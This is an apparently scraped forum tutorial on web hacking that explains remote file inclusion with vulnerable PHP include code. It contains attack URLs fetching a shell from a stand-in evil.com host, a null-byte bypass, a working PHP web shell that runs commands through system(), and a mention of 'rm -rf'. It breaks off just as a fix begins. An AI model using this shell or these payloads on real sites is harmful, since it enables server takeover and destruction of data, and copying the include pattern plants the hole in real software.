-= WebHacking
-= Intro
in this tutorial, we will discuss the vulnerabilities, and what goes wrong with the developer, and some ways to exploit them...
Enjoy!!
[hide=16]
Tutorial: [ Basic || 1 ]
+------------------------------------------+
|
| || Starter ||
|
+------------------------------------------+
Things to know:
=- Vulnerability : a security hole, can be exploited to change the way the webapp / software works / functions.
=- CMS's, Forums uses DataBases to store the info like users, posts, threads, messages and so on, its usually / mostly a MySQL server.
=- RFI [ Remote File Inclusion ] : a malicious user can include a 'bad' code to be executed on the vulnerable site.
=- LFI [ Local File Inclusion ] : a malicious user can open any file on the server.
=- SQL Injection : Injecting a MySQL query to bypass or get more info from a DataBase.
=- XSS [ Cross Site Scripting ] : if it was a permanent vulnerability, where the users input is saved, the user can log cookies, IP, and much more...
=- Exploit : a script made to maliciously use a vulnerability.
+------------------------------------------+
|
| || What goes wrong ||
|
+------------------------------------------+
We are going to take each vulnerability, and take alook at what goes wrong with the web developer, that made the script vulnerable...
=- RFI ::
RFI's are exploited by including a 'bad' code from another site, to the infected site, for example you can include a PHP-Shell, and execute command on the server using it...
this vulnerability is very dangerous, a site infected with it can be compromised easily...
an example of a code infected with a RFI:
Code:
<?php
$page = $_GET['page'];
if (isset($page))
{
include($page);
}
?>
as you can see, we are taking the variable page, and including it, now that script will work great and do what it's supposed to do, for example:
www.example.com/index.dmz?page=contact.dmz
this would open contact.dmz, BUT, what would a malicious user do?
http://www.example.com/index.dmz?pag.../www.evil.com/ shell.txt?
the shell code must be in a txt file, because this way the code will be parsed / executed on the vulnerable site.
what happens then?
that text file gets included, so lets say the shell.txt had the following
Code:
<?php
$command = $_GET['cmd'];
if ($command)
{
@system($command);
}
echo "
<form method='GET'>
<input type='text' name='cmd'>
<input type='submit' name='submit' value='Go!'>
</form>";
?>
a small text box would appear on the page, with a button, that would execute commands... the user can compromise the full site using this simple text box, if he had enough privs, he can do the following:
rm -rf
and delete your files...
some devs, think they can fix the vulnerability by doing the followin
Code:
<?php
$page = $_GET['page'];
$page = $page . ".php";
if (isset($page))
{
include($page);
}
?>
this way, you can only include .php files, and that is not really a big deal cause PHP gets parsed on the server side...
but, that wont stop some people, there is something called a NullByte, that would simply tell PHP to ignore anything after it... if someone wanted to exploit that code, he would do:
http://www.darkmindz.com/index.dmz?p...p://www.evil.c om/shell.txt?%00
as you can see, the [ %00 ] is the NullByte, that would get parsed this way:
Code:
<?php
$page = $_GET['page'];
$page = $page . ".php";
if (isset($page))
{
include('http://www.evil.com/shell.txt?'); // ignoring anything after the NullByte, which is in this case, the .php...
}
?>
so the question now, is how to completely secure this URL system?!
well, you can use a switch statement, and this way, anything other than what is already stated, wont be included.. ex:
[code]<?php
if(isset($_REQUEST['page']))
{
Reply With Quote
